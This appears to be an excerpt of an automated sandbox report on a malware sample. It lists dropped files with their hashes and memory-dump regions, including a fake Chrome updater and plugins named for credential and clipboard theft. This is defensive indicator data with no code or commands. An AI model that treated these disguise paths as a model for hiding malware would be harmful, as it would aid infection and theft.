SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/4396-470-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

C:\Users\Admin\AppData\Local\Temp\is-3686R.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1512-503-0x0000000000400000-0x0000000000513000-memory.dmp

memory/3212-513-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

memory/5380-541-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4396-542-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dd907b60f43046106437062016ffcf4
SHA1 7be52d7ddbd502e37507dd8c9cc78742f24109c3
SHA256 b1f9278445d619cbb13bc571c1b797ced6006ca6dd5076062da897e960928697
SHA512 11bf69a7d4eb40cf70ea4e2e35a9e97e9ebf7595b4d49136365b6a94bd2177453f52609bbcc4c27b06a997598313e3064e6f57b650de9b8131270f34c1e77e6e

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1732-561-0x00007FF601320000-0x00007FF601863000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbgcore.dll

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\dbgcore.DLL

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

memory/6136-604-0x00007FF709800000-0x00007FF709D43000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/6136-644-0x00007FF709800000-0x00007FF709D43000-memory.dmp

memory/5864-653-0x00000000010D0000-0x00000000010F0000-memory.dmp

memory/6136-654-0x00007FF709800000-0x00007FF709D43000-memory.dmp

memory/1940-659-0x00007FF7FBFB0000-0x00007FF7FBFC3000-memory.dmp

memory/5864-660-0x00007FF72C890000-0x00007FF72D0D0000-memory.dmp

memory/5864-666-0x00007FF72C890000-0x00007FF72D0D0000-memory.dmp

C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.proofing.msi.16.en-us.xml

MD5 d23cf0da0462ecbb77509f23f26edc57
SHA1 b0a3353089a1c174a092e7a791d286bb28bb764c
SHA256 9fc823530ff0f81c7064fb67d0f6932ad735897a2f5479a8f1d298075b04817f
SHA512 a113d35757e4abebede230ca695b2163f44910bdca6253ad65d3649ab1cdaa16da966f01dc1c85d782ed775757915c130e39d6aa008ff5b926674ac353d23dff

C:\ProgramData\95827229786989655457259687

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73